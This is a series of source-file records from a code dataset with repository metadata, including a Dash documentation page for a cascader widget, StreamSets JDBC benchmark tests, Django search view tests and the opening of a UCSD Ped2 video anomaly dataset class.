| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe3d794c54a1bf5bf74cd1b3b6795a3c45ba7bf7
| 38,911
|
py
|
Python
|
views/AntdCascader.py
|
RuixiangS/feffery-antd-docs
|
c48d34ed657ec8d6893440c0ee6382598c564922
|
[
"MIT"
] | 10
|
2021-05-20T06:52:42.000Z
|
2022-03-29T08:36:58.000Z
|
views/AntdCascader.py
|
RuixiangS/feffery-antd-docs
|
c48d34ed657ec8d6893440c0ee6382598c564922
|
[
"MIT"
] | null | null | null |
views/AntdCascader.py
|
RuixiangS/feffery-antd-docs
|
c48d34ed657ec8d6893440c0ee6382598c564922
|
[
"MIT"
] | 2
|
2021-09-14T07:07:00.000Z
|
2021-12-10T01:03:25.000Z
|
from dash import html
import feffery_antd_components as fac
import feffery_utils_components as fuc
import callbacks.AntdCascader
docs_content = html.Div(
[
html.Div(
[
html.H2(
'AntdCascader(id, className, style, *args, **kwargs)',
style={
'borderLeft': '4px solid grey',
'padding': '3px 0 3px 10px',
'backgroundColor': '#f5f5f5'
}
),
fac.AntdBackTop(
containerId='docs-content',
duration=0.6
),
html.Span(
'主要参数说明:',
id='主要参数说明',
style={
'borderLeft': '4px solid grey',
'padding': '3px 0 3px 10px',
'backgroundColor': '#f5f5f5',
'fontWeight': 'bold',
'fontSize': '1.2rem'
}
),
fuc.FefferyMarkdown(
markdownStr=open('documents/AntdCascader.md', encoding='utf-8').read()
),
html.Div(
html.Span(
'使用示例',
id='使用示例',
style={
'borderLeft': '4px solid grey',
'padding': '3px 0 3px 10px',
'backgroundColor': '#f5f5f5',
'fontWeight': 'bold',
'fontSize': '1.2rem'
}
),
style={
'marginBottom': '10px'
}
),
html.Div(
[
fac.AntdCascader(
placeholder='请在下列层级结构中进行选择',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
style={
'width': '300px'
}
),
fac.AntdDivider(
'基础使用',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdParagraph(
[
fac.AntdText(' 默认参数下,'),
fac.AntdText('AntdCascader', strong=True),
fac.AntdText('以单选的模式,供用户进行末端叶节点的选择')
]
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdCascader(
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
style={
'width': '300px'
}
)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='基础使用',
className='div-highlight'
),
html.Div(
[
fac.AntdSpace(
[
fac.AntdCascader(
placeholder='placement="bottomRight"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='bottomRight',
style={
'width': '300px'
}
),
fac.AntdCascader(
placeholder='placement="topLeft"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='topLeft',
style={
'width': '300px'
}
),
fac.AntdCascader(
placeholder='placement="topRight"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='topRight',
style={
'width': '300px'
}
)
]
),
fac.AntdDivider(
'不同的悬浮层展开方位',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdSpace(
[
fac.AntdCascader(
placeholder='placement="bottomRight"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='bottomRight',
style={
'width': '300px'
}
),
fac.AntdCascader(
placeholder='placement="topLeft"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='topLeft',
style={
'width': '300px'
}
),
fac.AntdCascader(
placeholder='placement="topRight"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='topRight',
style={
'width': '300px'
}
)
]
)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='不同的悬浮层展开方位',
className='div-highlight'
),
html.Div(
[
fac.AntdCascader(
placeholder='请在下列层级结构中进行选择',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
expandTrigger='hover',
style={
'width': '300px'
}
),
fac.AntdDivider(
'鼠标悬浮触发展开子菜单',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdCascader(
placeholder='请在下列层级结构中进行选择',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
expandTrigger='hover',
style={
'width': '300px'
}
)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='鼠标悬浮触发展开子菜单',
className='div-highlight'
),
html.Div(
[
fac.AntdCascader(
placeholder='多选模式:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
multiple=True,
style={
'width': '300px'
}
),
fac.AntdDivider(
'多选模式',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdCascader(
placeholder='多选模式:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
multiple=True,
style={
'width': '300px'
}
)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='多选模式',
className='div-highlight'
),
html.Div(
[
fac.AntdSpin(
fac.AntdSpace(
[
html.Div(
[
fac.AntdText('单选value:', strong=True),
fac.AntdText(id='cascader-demo-output')
]
),
html.Div(
[
fac.AntdText('多选value:', strong=True),
fac.AntdText(id='cascader-multiple-demo-output')
]
),
fac.AntdCascader(
id='cascader-demo',
placeholder='单选回调示例:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
style={
'width': '300px'
}
),
fac.AntdCascader(
id='cascader-multiple-demo',
placeholder='多选回调示例:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
multiple=True,
style={
'width': '300px'
}
)
],
direction='vertical'
),
text='回调中'
),
fac.AntdDivider(
'回调示例',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdParagraph(
[
fac.AntdText(' AntdCascader', strong=True),
fac.AntdText('已选择的值会在value中以层级选择路径对应值列表的形式进行记录,当满足后代节点被全选时则会仅记录对应的祖先节点值')
]
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdSpin(
fac.AntdSpace(
[
html.Div(
[
fac.AntdText('单选value:', strong=True),
fac.AntdText(id='cascader-demo-output')
]
),
html.Div(
[
fac.AntdText('多选value:', strong=True),
fac.AntdText(id='cascader-multiple-demo-output')
]
),
fac.AntdCascader(
id='cascader-demo',
placeholder='单选回调示例:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
style={
'width': '300px'
}
),
fac.AntdCascader(
id='cascader-multiple-demo',
placeholder='多选回调示例:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
multiple=True,
style={
'width': '300px'
}
)
],
direction='vertical'
),
text='回调中'
)
...
@app.callback(
Output('cascader-demo-output', 'children'),
Input('cascader-demo', 'value')
)
def cascader_demo_callback(value):
return str(value)
@app.callback(
Output('cascader-multiple-demo-output', 'children'),
Input('cascader-multiple-demo', 'value')
)
def cascader_multiple_demo_callback(value):
return str(value)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='回调示例',
className='div-highlight'
),
html.Div(style={'height': '100px'})
],
style={
'flex': 'auto'
}
),
html.Div(
fac.AntdAnchor(
linkDict=[
{'title': '主要参数说明', 'href': '#主要参数说明'},
{
'title': '使用示例',
'href': '#使用示例',
'children': [
{'title': '基础使用', 'href': '#基础使用'},
{'title': '不同的悬浮层展开方位', 'href': '#不同的悬浮层展开方位'},
{'title': '鼠标悬浮触发展开子菜单', 'href': '#鼠标悬浮触发展开子菜单'},
{'title': '多选模式', 'href': '#多选模式'},
{'title': '回调示例', 'href': '#回调示例'}
]
},
],
containerId='docs-content',
targetOffset=200
),
style={
'flex': 'none',
'margin': '20px'
}
)
],
style={
'display': 'flex'
}
)
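# --- Hedged usage sketch (not part of the original file) ---------------------
# docs_content is only a Dash layout tree; in the real project it is mounted
# by the docs application together with callbacks.AntdCascader. The snippet
# below is an illustrative, standalone way to preview the page and is not how
# the project itself wires things up.
if __name__ == '__main__':
    from dash import Dash

    _preview_app = Dash(__name__)
    _preview_app.layout = docs_content
    _preview_app.run_server(debug=True)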
| 40.07312
| 105
| 0.175169
| 1,398
| 38,911
| 4.864807
| 0.102289
| 0.056462
| 0.06352
| 0.047052
| 0.863402
| 0.842376
| 0.825026
| 0.813704
| 0.78709
| 0.78709
| 0
| 0.060354
| 0.740253
| 38,911
| 970
| 106
| 40.114433
| 0.612546
| 0
| 0
| 0.602345
| 0
| 0
| 0.353216
| 0.019429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004264
| 0
| 0.006397
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe403b2e97efd4d6793d7d309731facd2749417a
| 8,222
|
py
|
Python
|
performance/test_jdbc_multitable_consumer.py
|
streamsets/datacollector-tests-external
|
6f255b5e7496deeef333b57a5e9df4911ba3ef00
|
[
"Apache-2.0"
] | 14
|
2019-03-04T10:12:39.000Z
|
2021-11-24T16:17:09.000Z
|
performance/test_jdbc_multitable_consumer.py
|
streamsets/datacollector-tests-external
|
6f255b5e7496deeef333b57a5e9df4911ba3ef00
|
[
"Apache-2.0"
] | 48
|
2019-03-08T14:59:06.000Z
|
2021-08-13T14:49:56.000Z
|
performance/test_jdbc_multitable_consumer.py
|
streamsets/datacollector-tests
|
6c3e908768e1d4a586e9183e2141096921ecd5be
|
[
"Apache-2.0"
] | 23
|
2018-09-24T20:49:17.000Z
|
2021-11-24T16:17:11.000Z
|
# Copyright 2017 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The tests in this module run high-volume pipelines for the purpose of performance testing.
"""
import logging
import random
import string
import uuid
from time import sleep
import pytest
import sqlalchemy
from streamsets.testframework.markers import database, sdc_min_version
from streamsets.testframework.utils import get_random_string
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def sdc_builder_hook():
def hook(data_collector):
data_collector.SDC_JAVA_OPTS = '-Xmx8192m -Xms8192m'
return hook
@pytest.mark.parametrize('number_of_rows', (500_000, 1_000_000, 5_000_000))
@database
def test_jdbc_multitable_consumer_origin_default(sdc_builder, database, benchmark, number_of_rows):
"""Performance benchmark a simple JDBC mutli-table consumer to trash pipeline."""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'{src_table_prefix}%'}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(40)))
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding %s rows into %s database ...', number_of_rows, database.type)
connection = database.engine.connect()
connection.execute(table.insert(),
[{'id': i, 'name': str(uuid.uuid4())} for i in range(1, number_of_rows+1)])
def benchmark_pipeline(executor, pipeline):
pipeline.id = str(uuid.uuid4())
executor.add_pipeline(pipeline)
executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(number_of_rows, timeout_sec=3600)
executor.stop_pipeline(pipeline).wait_for_stopped()
executor.remove_pipeline(pipeline)
benchmark.pedantic(benchmark_pipeline, args=(sdc_builder, pipeline), rounds=2)
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('2.7.0.0')
@pytest.mark.parametrize('number_of_threads', (2, 4, 8, 16))
@pytest.mark.parametrize('number_of_rows', (500_000, 1_000_000, 5_000_000))
@database
def test_jdbc_multitable_consumer_origin_multithreaded(sdc_builder, database, benchmark,
number_of_rows, number_of_threads):
"""Performance benchmark a simple JDBC mutli-table consumer to trash pipeline."""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
partition_size = str(int(number_of_rows / number_of_threads))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{'tablePattern': f'{src_table_prefix}%',
'partitionSize': partition_size}],
number_of_threads=number_of_threads,
maximum_pool_size=number_of_threads)
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(40)))
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding %s rows into %s database ...', number_of_rows, database.type)
connection = database.engine.connect()
connection.execute(table.insert(),
[{'id': i, 'name': str(uuid.uuid4())} for i in range(1, number_of_rows+1)])
def benchmark_pipeline(executor, pipeline):
pipeline.id = str(uuid.uuid4())
executor.add_pipeline(pipeline)
executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(number_of_rows, timeout_sec=3600)
executor.stop_pipeline(pipeline).wait_for_stopped()
executor.remove_pipeline(pipeline)
benchmark.pedantic(benchmark_pipeline, args=(sdc_builder, pipeline), rounds=2)
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('2.7.0.0')
@pytest.mark.parametrize('number_of_rows', (500_000, 1_000_000, 5_000_000))
@database
def test_jdbc_multitable_consumer_origin_partitioning_disabled(sdc_builder, database, benchmark, number_of_rows):
"""Performance benchmark a simple JDBC mutli-table consumer to trash pipeline."""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{'tablePattern': f'{src_table_prefix}%',
'partitioningMode': 'DISABLED'}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(40)))
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding %s rows into %s database ...', number_of_rows, database.type)
connection = database.engine.connect()
connection.execute(table.insert(),
[{'id': i, 'name': str(uuid.uuid4())} for i in range(1, number_of_rows+1)])
def benchmark_pipeline(executor, pipeline):
pipeline.id = str(uuid.uuid4())
executor.add_pipeline(pipeline)
executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(number_of_rows, timeout_sec=3600)
executor.stop_pipeline(pipeline).wait_for_stopped()
executor.remove_pipeline(pipeline)
benchmark.pedantic(benchmark_pipeline, args=(sdc_builder, pipeline), rounds=2)
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
| 45.175824
| 118
| 0.685356
| 982
| 8,222
| 5.477597
| 0.203666
| 0.03272
| 0.035694
| 0.018963
| 0.804239
| 0.804239
| 0.796431
| 0.78918
| 0.78918
| 0.78918
| 0
| 0.020225
| 0.212235
| 8,222
| 181
| 119
| 45.425414
| 0.810252
| 0.107638
| 0
| 0.788618
| 0
| 0
| 0.093673
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065041
| false
| 0
| 0.073171
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe8530d264144ce505dd57ab76c2653b64afeea0
| 105
|
py
|
Python
|
fppy/model/__init__.py
|
uit-cosmo/filtered-point-process
|
2d681b9a6a09dcfa3095f5917bf062697540fb49
|
[
"MIT"
] | 1
|
2022-02-09T08:57:08.000Z
|
2022-02-09T08:57:08.000Z
|
fppy/model/__init__.py
|
uit-cosmo/filtered-point-process
|
2d681b9a6a09dcfa3095f5917bf062697540fb49
|
[
"MIT"
] | 1
|
2022-01-26T11:43:55.000Z
|
2022-01-26T11:43:55.000Z
|
fppy/model/__init__.py
|
uit-cosmo/fppy
|
2d681b9a6a09dcfa3095f5917bf062697540fb49
|
[
"MIT"
] | null | null | null |
from fppy.model.forcing import *
from fppy.model.fpp_model import *
from fppy.model.pulse_shape import *
| 26.25
| 36
| 0.8
| 17
| 105
| 4.823529
| 0.470588
| 0.292683
| 0.47561
| 0.463415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 105
| 3
| 37
| 35
| 0.88172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fea6e2d8cb83d8a1eda2cfe916c82ba6744c6a20
| 952
|
py
|
Python
|
alexandriadocs/search/tests/test_views.py
|
srtab/alexandria-docs
|
94b221a4140db23ad6d97a98c7cf521fbdefbc0a
|
[
"Apache-2.0"
] | 2
|
2017-03-26T22:38:49.000Z
|
2017-04-22T11:28:07.000Z
|
alexandriadocs/search/tests/test_views.py
|
srtab/alexandriadocs
|
94b221a4140db23ad6d97a98c7cf521fbdefbc0a
|
[
"Apache-2.0"
] | 22
|
2017-06-10T17:15:59.000Z
|
2018-08-06T14:57:44.000Z
|
alexandriadocs/search/tests/test_views.py
|
srtab/alexandria-docs
|
94b221a4140db23ad6d97a98c7cf521fbdefbc0a
|
[
"Apache-2.0"
] | 1
|
2017-03-24T23:10:16.000Z
|
2017-03-24T23:10:16.000Z
|
# -*- coding: utf-8 -*-
from django.test import TestCase
from django.urls import reverse
class SearchProjectViewTest(TestCase):
def setUp(self):
self.url = reverse('search:index')
def test_template_used(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed("search/index.html")
def test_search(self):
        response = self.client.get(self.url, {'q': 'search'})
self.assertEqual(response.status_code, 200)
class SearchPageViewTest(TestCase):
def setUp(self):
self.url = reverse('search:pages')
def test_template_used(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed("search/index.html")
def test_search(self):
response = self.client.get(self.url, {'q': 'search'})
self.assertEqual(response.status_code, 200)
| 28
| 61
| 0.670168
| 115
| 952
| 5.46087
| 0.286957
| 0.066879
| 0.101911
| 0.140127
| 0.802548
| 0.802548
| 0.802548
| 0.802548
| 0.675159
| 0.675159
| 0
| 0.017083
| 0.20063
| 952
| 33
| 62
| 28.848485
| 0.808147
| 0.022059
| 0
| 0.727273
| 0
| 0
| 0.077503
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 1
| 0.272727
| false
| 0
| 0.090909
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22a577d15ada279ebe5e9bc0c5f6dd8f6ef7e022
| 14,831
|
py
|
Python
|
datasets/ucsd_ped2.py
|
NjuHaoZhang/AutoregressModel-AE_VAD_CVPR2019
|
b9843f34ecb59f908d78ddf977ee4670e0ed6cb4
|
[
"MIT"
] | 12
|
2020-08-24T08:03:51.000Z
|
2022-03-14T06:40:20.000Z
|
datasets/ucsd_ped2.py
|
zkeenly/AutoregressModel-AE_VAD_CVPR2019
|
b9843f34ecb59f908d78ddf977ee4670e0ed6cb4
|
[
"MIT"
] | null | null | null |
datasets/ucsd_ped2.py
|
zkeenly/AutoregressModel-AE_VAD_CVPR2019
|
b9843f34ecb59f908d78ddf977ee4670e0ed6cb4
|
[
"MIT"
] | 5
|
2020-10-10T10:28:19.000Z
|
2021-05-04T07:42:52.000Z
|
from glob import glob
from os.path import basename
from os.path import isdir
from os.path import join
from typing import List
from typing import Tuple
import numpy as np
import skimage.io as io
import torch
from skimage.transform import resize
from torchvision import transforms
from datasets.base import VideoAnomalyDetectionDataset
from datasets.transforms import ToCrops
from datasets.transforms import ToFloatTensor3D
from utils import concat_collate
# For Testing
# class UCSDPed2(VideoAnomalyDetectionDataset):
# pass
class UCSDPed2(VideoAnomalyDetectionDataset):
"""
Models UCSD Ped2 dataset for video anomaly detection.
"""
def __init__(self, path):
# type: (str) -> None
"""
Class constructor.
:param path: The folder in which UCSD is stored.
"""
super(UCSDPed2, self).__init__()
self.path = join(path, 'UCSDped2')
# Test directory
self.test_dir = join(self.path, 'Test')
# Transform
self.transform = transforms.Compose([ToFloatTensor3D(), ToCrops(self.raw_shape, self.crop_shape)])
# Load all test ids
self.test_ids = self.load_test_ids()
# Other utilities
self.cur_len = 0
self.cur_video_id = None
self.cur_video_frames = None
self.cur_video_gt = None
def load_test_ids(self):
# type: () -> List[str]
"""
Loads the set of all test video ids.
############################################################################################################
# By HaoZhang
# basename strips the directory path and returns only the file name: e.g. os.path.basename('d:\\library\\book.txt') => 'book.txt'
# glob(join(self.test_dir, '**')): returns the path names under {self.test_dir/'**'};
# '*' matches the preceding expression zero or more times, equivalent to {0,}.
# Combined with the if below, this function returns all directory names under self.test_dir except those containing 'gt',
# which, given the UCSD dataset layout, are the TestXXX (XXX: 001~012) directories under UCSD_Anomaly_Dataset.v1p2/UCSDped2/Test.
############################################################################################################
:return: The list of test ids.
"""
return sorted([basename(d) for d in glob(join(self.test_dir, '**'))
if isdir(d) and 'gt' not in basename(d)])
def load_test_sequence_frames(self, video_id):
# type: (str) -> np.ndarray
"""
Loads a test video in memory.
:param video_id: the id of the test video to be loaded
:return: the video in a np.ndarray, with shape (n_frames, h, w, c).
"""
c, t, h, w = self.raw_shape
sequence_dir = join(self.test_dir, video_id)
